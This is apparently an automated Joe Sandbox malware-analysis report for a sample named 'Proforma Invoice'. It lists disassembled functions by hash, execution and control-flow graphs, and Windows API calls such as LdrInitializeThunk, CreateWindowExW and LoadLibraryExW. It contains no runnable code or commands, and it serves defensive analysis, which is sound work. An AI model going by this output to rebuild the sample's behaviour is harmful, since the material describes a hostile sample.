                                                                                                    • Opcode Fuzzy Hash: 398e7646fd765f65fe66270dd470c219a3fc7a97ab9eba72528a7c58a736e451
                                                                                                    • Instruction Fuzzy Hash: A031AF72D096589FDB09CF6AD8416DEBFB7EBC6200F18C0ABD508EB255D7314906CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F7280 Relevance: .1, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5e8c576dae3bc796eb9fe505c89a72d22966d092caadb3515aa90a6e6fa0fa39
                                                                                                    • Instruction ID: 492ce0f8829647a38aa471c00857ffb96cd508a1550911afb7fcb759bb25c455
                                                                                                    • Opcode Fuzzy Hash: 5e8c576dae3bc796eb9fe505c89a72d22966d092caadb3515aa90a6e6fa0fa39
                                                                                                    • Instruction Fuzzy Hash: BD215C71E196089BDB09CF6BD94169EBBF7AFC9200F19C06BD408E7254EA3049418B51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F2F00 Relevance: .1, Instructions: 66COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 53ccdcd6baa0985b994d05b61a12cfec9f5afbf88ae03cad7b34486198d8f3bd
                                                                                                    • Instruction ID: 4471853120452b0395c54924b2ee1d2f22729e9ff5958843d197c07b3bf8b22b
                                                                                                    • Opcode Fuzzy Hash: 53ccdcd6baa0985b994d05b61a12cfec9f5afbf88ae03cad7b34486198d8f3bd
                                                                                                    • Instruction Fuzzy Hash: 41211871E106189BEB18CFABD8406DEFBF7AFC8310F14C16AD508A6258DB701A55CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F1160 Relevance: .1, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c89c2d92250b9549900f9337700dc2896737366de5828661339edea5a191633e
                                                                                                    • Instruction ID: 6a83c285dd87669491afc2301df1ffda43537ea669d78682d1992fe875d735fe
                                                                                                    • Opcode Fuzzy Hash: c89c2d92250b9549900f9337700dc2896737366de5828661339edea5a191633e
                                                                                                    • Instruction Fuzzy Hash: 8E21B971E156189BEB58CF6BD84069EFBF7AFC8204F04C17AD508A6264EB301956CF51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F72D8 Relevance: .1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d0f0e84b3e9b28de28f8f3367af3250752676388635d4c3138e1478993263a7e
                                                                                                    • Instruction ID: 5c41569cc24fedb12398ffb45170a0c1fd0232430531f04abe21ce7b19a08528
                                                                                                    • Opcode Fuzzy Hash: d0f0e84b3e9b28de28f8f3367af3250752676388635d4c3138e1478993263a7e
                                                                                                    • Instruction Fuzzy Hash: F121F471E156199BEB08CFABE9416DEFBF7EBC8300F14C02AD508A7254EB705A518B51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F6710 Relevance: .1, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a9e0e0ef3f1a1ab3ce5a8bfdc8d9f2f2c570c00b2b7e34c7e59269f85ce1f3c5
                                                                                                    • Instruction ID: 99a39d936b067b93b81634fa1398d48d725e120dea474f140df5a644add7809f
                                                                                                    • Opcode Fuzzy Hash: a9e0e0ef3f1a1ab3ce5a8bfdc8d9f2f2c570c00b2b7e34c7e59269f85ce1f3c5
                                                                                                    • Instruction Fuzzy Hash: FB110771E146189BEB1CCFABD84159EFBF7AFC8300F04C43AD918A6258DF3409568B51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F6C78 Relevance: .1, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f74ca6eb71218ace0d71b2ffed8779126cd9891515f29a9837d45deda6c98a9d
                                                                                                    • Instruction ID: b9568413ea14594c343ce1d3c448f1c50dfb326fa67f5f474423d04d7412054e
                                                                                                    • Opcode Fuzzy Hash: f74ca6eb71218ace0d71b2ffed8779126cd9891515f29a9837d45deda6c98a9d
                                                                                                    • Instruction Fuzzy Hash: 70111771E142199BEB58CFABD9416AEFBF7FBC8200F14C02AD508A7254DB305A518F51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F2EF0 Relevance: .1, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d62e26853fee8044016616d043c922c9f7196d9524aebb702255e34d0555b4cc
                                                                                                    • Instruction ID: b7b03a2edbc33200d7ba0c0e59e3712366a49307ee141d60a504fb3a7da07e3f
                                                                                                    • Opcode Fuzzy Hash: d62e26853fee8044016616d043c922c9f7196d9524aebb702255e34d0555b4cc
                                                                                                    • Instruction Fuzzy Hash: 5D21EDB1E106189BEB18CFA6D94479EBFF7AFC8300F14C16AD408A6354DB745955CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F6C68 Relevance: .1, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c26b2417bedeef178c1a2bbdb98356d67cdbae0498e78bdecf9ee3cec6b15b4d
                                                                                                    • Instruction ID: 94fabff6058e3dc26c5ca6e34efef71f760f801ac75821616d708c3a925be284
                                                                                                    • Opcode Fuzzy Hash: c26b2417bedeef178c1a2bbdb98356d67cdbae0498e78bdecf9ee3cec6b15b4d
                                                                                                    • Instruction Fuzzy Hash: 58113A70E142189BEB58CF6BD94169EFBF3AFC9300F14C03AD408A7254EB704A468F51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F6700 Relevance: .1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e9d500b5547361ab23bca2aefbb4ead6209940e02c9df319822bea3fa62d1f08
                                                                                                    • Instruction ID: f943f5df58318ec2995c34dbada179fe79f6819c1ef78a45af741c06a7bcc310
                                                                                                    • Opcode Fuzzy Hash: e9d500b5547361ab23bca2aefbb4ead6209940e02c9df319822bea3fa62d1f08
                                                                                                    • Instruction Fuzzy Hash: 25114971E046089BEB0CCFABD8401AEFBF3AFC8300F08C47AD818A6268DF3405128B10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F1151 Relevance: .1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 032916464882f6c082a0851b6e97cdd413eb7b3f8823f0f9733c8bc1ca5f8470
                                                                                                    • Instruction ID: c4642d5f320540e2977d74fab3d8b9c5c39aa54e9a75b8301e05d2c5e09e9766
                                                                                                    • Opcode Fuzzy Hash: 032916464882f6c082a0851b6e97cdd413eb7b3f8823f0f9733c8bc1ca5f8470
                                                                                                    • Instruction Fuzzy Hash: E911C171E14A189BEB18CFABD94079EFBF3AFC8201F08C57AC518B6254EB3405568F15
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:13.7%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:6.2%
                                                                                                    Total number of Nodes:48
                                                                                                    Total number of Limit Nodes:2
                                                                                                    execution_graph 34377 69679d0 34378 69679f6 34377->34378 34381 6964a8c 34378->34381 34384 6964a97 34381->34384 34382 6969b39 34399 696972c 34382->34399 34384->34382 34385 6969b29 34384->34385 34389 6969c53 34385->34389 34394 6969c60 34385->34394 34386 6969b37 34391 6969c60 34389->34391 34390 6969d00 34390->34386 34403 6969d12 34391->34403 34407 6969d18 34391->34407 34396 6969c74 34394->34396 34395 6969d00 34395->34386 34397 6969d12 CallWindowProcW 34396->34397 34398 6969d18 CallWindowProcW 34396->34398 34397->34395 34398->34395 34400 6969737 34399->34400 34401 696b3fa CallWindowProcW 34400->34401 34402 696b3a9 34400->34402 34401->34402 34402->34386 34404 6969d19 34403->34404 34405 6969d29 34404->34405 34410 696b33b 34404->34410 34405->34390 34408 6969d29 34407->34408 34409 696b33b CallWindowProcW 34407->34409 34408->34390 34409->34408 34411 696972c CallWindowProcW 34410->34411 34412 696b34a 34411->34412 34412->34405 34413 6965810 34414 6965852 34413->34414 34415 6965858 LoadLibraryExW 34413->34415 34414->34415 34416 6965889 34415->34416 34421 696e040 34422 696e068 34421->34422 34425 696e094 34421->34425 34423 696e071 34422->34423 34426 696c994 34422->34426 34427 696c99f 34426->34427 34429 696e42b 34427->34429 34430 696c9b0 34427->34430 34429->34425 34431 696e500 OleInitialize 34430->34431 34432 696e564 34431->34432 34432->34429 34433 67da4c0 34434 67da4df LdrInitializeThunk 34433->34434 34436 67da532 34434->34436 34417 6967818 34418 6967880 CreateWindowExW 34417->34418 34420 696793c 34418->34420

                                                                                                    Executed Functions

                                                                                                    Function 067DA4C0 Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1593 67da4c0-67da52c LdrInitializeThunk 1601 67da675-67da692 1593->1601 1602 67da532-67da54c 1593->1602 1614 67da697-67da6a0 1601->1614 1602->1601 1605 67da552-67da56c 1602->1605 1608 67da56e-67da570 1605->1608 1609 67da572 1605->1609 1611 67da575-67da5d0 call 67da0b0 1608->1611 1609->1611 1621 67da5d6 1611->1621 1622 67da5d2-67da5d4 1611->1622 1623 67da5d9-67da673 call 67da0b0 1621->1623 1622->1623 1623->1614
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646919926.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_67d0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 47120b074a864024bb9d434d6e5a19f0fd8a85257369471b40e227f171dbb80e
                                                                                                    • Instruction ID: 48c0bfcb90029103ce914c154d4fe52641ff2afb050f2643992f49f8dc8f200b
                                                                                                    • Opcode Fuzzy Hash: 47120b074a864024bb9d434d6e5a19f0fd8a85257369471b40e227f171dbb80e
                                                                                                    • Instruction Fuzzy Hash: 55518130A102059FCB54EFB4D898AAEB7B5BF88214F04C979D5169B391EF30D844CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0678E1D8 Relevance: 1.5, Instructions: 1480COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3b99038a374506816540c00ef596fe521c039334538a70606b4c89f5f04bb383
                                                                                                    • Instruction ID: 4aa5759d3c7f74f06c84c199dbed4855555bb2fecb3393a2defb4692975ab662
                                                                                                    • Opcode Fuzzy Hash: 3b99038a374506816540c00ef596fe521c039334538a70606b4c89f5f04bb383
                                                                                                    • Instruction Fuzzy Hash: 74B22330F442458FEBA4EB78C894BBEBBA2EB85314F148569E50ADB391DB34DC41C791
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06788CF4 Relevance: .7, Instructions: 659COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 845f7377e3370e0b055423cb315c2cdb442f4e474a32015d0b9619d51b612fce
                                                                                                    • Instruction ID: 6f50d1ee6218a3156b0f810dac9e06b314d19ddd9a3695230c7e54fc6d194d7c
                                                                                                    • Opcode Fuzzy Hash: 845f7377e3370e0b055423cb315c2cdb442f4e474a32015d0b9619d51b612fce
                                                                                                    • Instruction Fuzzy Hash: 0642A330E44248CFEB64EBA8C494BBEBBB2AF85304F24C569D509AF285DB35DC45CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06785868 Relevance: .4, Instructions: 402COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3b0d68a3d208c94e94d4d923caebf7b760995c35c0e95791f0880b22c98a0679
                                                                                                    • Instruction ID: ca65ea7418f78132303cf052c4e7d051b7757edb6161f623ec8bdd80ef1c6b70
                                                                                                    • Opcode Fuzzy Hash: 3b0d68a3d208c94e94d4d923caebf7b760995c35c0e95791f0880b22c98a0679
                                                                                                    • Instruction Fuzzy Hash: 6DF16F30E402099FDB94EFB8C5886ADB7F2AF88314F248665D915EB395DB31DC42CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0678B738 Relevance: .3, Instructions: 337COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646762235.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6780000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 289ba7e1229b8179362d3aa0b2a9a7470e1783a19d26331af6fe9a1b38c0c9bf
                                                                                                    • Instruction ID: 8a7e7b61cf8be7b67f91e547c718bf373efa4bdbf2d60d25a2d288f9ecccd16c
                                                                                                    • Opcode Fuzzy Hash: 289ba7e1229b8179362d3aa0b2a9a7470e1783a19d26331af6fe9a1b38c0c9bf
                                                                                                    • Instruction Fuzzy Hash: 4BC1D230F402188FDBA4EB74C858B7EBAE6AF85704F158469C50AAB391DF71DC45CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 069653C8 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1483 69653c8-69653d0 1484 69653db-69653dd 1483->1484 1485 69653d6 call 69648e4 1483->1485 1486 69653f3-69653f7 1484->1486 1487 69653df-69653ed call 6965641 1484->1487 1485->1484 1488 696540b-696544c 1486->1488 1489 69653f9-6965403 1486->1489 1487->1486 1491 6965528-69655e8 1487->1491 1494 696544e-6965456 1488->1494 1495 6965459-6965467 1488->1495 1489->1488 1531 69655f0-696561b GetModuleHandleW 1491->1531 1532 69655ea-69655ed 1491->1532 1494->1495 1496 696548b-696548d 1495->1496 1497 6965469-696546e 1495->1497 1501 6965490-6965497 1496->1501 1499 6965470-6965477 call 69648f0 1497->1499 1500 6965479 1497->1500 1506 696547b-6965489 1499->1506 1500->1506 1504 69654a4-69654ab 1501->1504 1505 6965499-69654a1 1501->1505 1508 69654ad-69654b5 1504->1508 1509 69654b8-69654c1 1504->1509 1505->1504 1506->1501 1508->1509 1513 69654c3-69654cb 1509->1513 1514 69654ce-69654d3 1509->1514 1513->1514 1515 69654d5-69654dc 1514->1515 1516 69654f1-69654fe 1514->1516 1515->1516 1517 69654de-69654ee call 69629e4 call 6964900 1515->1517 1522 6965500-696551e 1516->1522 1523 6965521-6965527 1516->1523 1517->1516 1522->1523 1533 6965624-6965638 1531->1533 1534 696561d-6965623 1531->1534 1532->1531 1534->1533
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 4139908857-0
                                                                                                    • Opcode ID: 160cdc1d555630ddf78bf4a2c18c5e3bf77e0af65f32fe44538ee84fd96ae008
                                                                                                    • Instruction ID: e473eb3e635f469f60e4e675cdc1e37efcd8ee38ea95817ff8182ef28c98424b
                                                                                                    • Opcode Fuzzy Hash: 160cdc1d555630ddf78bf4a2c18c5e3bf77e0af65f32fe44538ee84fd96ae008
                                                                                                    • Instruction Fuzzy Hash: 33715570A00B058FD7A4DF2AD54076AB7F5BF88204F10892EE48ADBA40DB75E859CF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 067DA4B0 Relevance: 1.7, APIs: 1, Instructions: 152libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1537 67da4b0-67da4b2 1538 67da4ba-67da4bd 1537->1538 1539 67da4b4 1537->1539 1543 67da4be-67da4d5 1538->1543 1540 67da454-67da45b 1539->1540 1541 67da4b6 1539->1541 1541->1543 1544 67da4b8-67da4b9 1541->1544 1546 67da4df 1543->1546 1544->1538 1547 67da4e7-67da4f9 1546->1547 1550 67da501-67da507 1547->1550 1551 67da50e 1550->1551 1552 67da515-67da52c LdrInitializeThunk 1551->1552 1553 67da675-67da692 1552->1553 1554 67da532-67da54c 1552->1554 1566 67da697-67da6a0 1553->1566 1554->1553 1557 67da552-67da56c 1554->1557 1560 67da56e-67da570 1557->1560 1561 67da572 1557->1561 1563 67da575-67da5d0 call 67da0b0 1560->1563 1561->1563 1573 67da5d6 1563->1573 1574 67da5d2-67da5d4 1563->1574 1575 67da5d9-67da673 call 67da0b0 1573->1575 1574->1575 1575->1566
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.646919926.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_67d0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: bde1fbb641bd9cd2887874aa68ff769da7e89392655def8c876c529b45746fcd
                                                                                                    • Instruction ID: ff73f74084d5e0a611707d00b0255027e421f38cb8a8bfd1656cb1771d9a7c01
                                                                                                    • Opcode Fuzzy Hash: bde1fbb641bd9cd2887874aa68ff769da7e89392655def8c876c529b45746fcd
                                                                                                    • Instruction Fuzzy Hash: 4F519130A102059FCB54EFB4D858AAEB7F5BF88204F14CD39E5169B751EF30D8458BA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06967806 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1641 6967806-696787e 1643 6967880-6967886 1641->1643 1644 6967889-6967890 1641->1644 1643->1644 1645 6967892-6967898 1644->1645 1646 696789b-69678d3 1644->1646 1645->1646 1647 69678db-696793a CreateWindowExW 1646->1647 1648 6967943-696797b 1647->1648 1649 696793c-6967942 1647->1649 1653 696797d-6967980 1648->1653 1654 6967988 1648->1654 1649->1648 1653->1654 1655 6967989 1654->1655 1655->1655
                                                                                                    APIs
                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0696792A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 716092398-0
                                                                                                    • Opcode ID: 897c3878255d0ac53b084f6e522fc6a76b6f71ce9fe7336ac54fa43b5540a7cd
                                                                                                    • Instruction ID: 154f9b3dcb1b5b8a05772c5e59e44e193d3c3d61b7b8bf7284e7ed063739f208
                                                                                                    • Opcode Fuzzy Hash: 897c3878255d0ac53b084f6e522fc6a76b6f71ce9fe7336ac54fa43b5540a7cd
                                                                                                    • Instruction Fuzzy Hash: 0451C0B1D103499FDB14CFAAC884ADEBFB5BF48314F24862AE819AB210D7759845CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06967818 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1656 6967818-696787e 1657 6967880-6967886 1656->1657 1658 6967889-6967890 1656->1658 1657->1658 1659 6967892-6967898 1658->1659 1660 696789b-696793a CreateWindowExW 1658->1660 1659->1660 1662 6967943-696797b 1660->1662 1663 696793c-6967942 1660->1663 1667 696797d-6967980 1662->1667 1668 6967988 1662->1668 1663->1662 1667->1668 1669 6967989 1668->1669 1669->1669
                                                                                                    APIs
                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0696792A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 716092398-0
                                                                                                    • Opcode ID: 054964e5fe447b36781e598af464387cc6fb5d30cf86a5953075a5c4909cbb8b
                                                                                                    • Instruction ID: aa0aa38aa04fcee327c0e966ed10a930aee3ad76c6e4a0cb76ef5124d9b3eeea
                                                                                                    • Opcode Fuzzy Hash: 054964e5fe447b36781e598af464387cc6fb5d30cf86a5953075a5c4909cbb8b
                                                                                                    • Instruction Fuzzy Hash: 2541CEB1D10309DFDB14CFAAC984ADEBBF5BF48314F24862AE819AB210D7759845CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0696972C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1770 696972c-696b39c 1773 696b3a2-696b3a7 1770->1773 1774 696b44c-696b46c call 6964a8c 1770->1774 1776 696b3fa-696b432 CallWindowProcW 1773->1776 1777 696b3a9-696b3e0 1773->1777 1781 696b46f-696b47c 1774->1781 1779 696b434-696b43a 1776->1779 1780 696b43b-696b44a 1776->1780 1783 696b3e2-696b3e8 1777->1783 1784 696b3e9-696b3f8 1777->1784 1779->1780 1780->1781 1783->1784 1784->1781
                                                                                                    APIs
                                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 0696B421
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.647504901.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_6960000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallProcWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2714655100-0
                                                                                                    • Opcode ID: 48286fed00bcbb4736926c2cb139b1add0aef4510ba4912c4c0c1929db5d4371
                                                                                                    • Instruction ID: 03bb56426afd7da451255b73326a285e48809368160feec8af619d7b25afdf7e
                                                                                                    • Opcode Fuzzy Hash: 48286fed00bcbb4736926c2cb139b1add0aef4510ba4912c4c0c1929db5d4371
                                                                                                    • Instruction Fuzzy Hash: 28416BB4A003058FDB50CF99C488BAABBF5FF88314F28C459E519AB721D770A845CFA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 06965808 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1787 6965808-6965850 1789 6965852-6965855 1787->1789 1790 6965858-6965887 LoadLibraryExW 1787->1790 1789->1790 1791 6965890-69658ad 1790->1791 1792 6965889-696588f 1790->1792 1792->1791
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0696587A
                                                                                                    Memory Dump Source
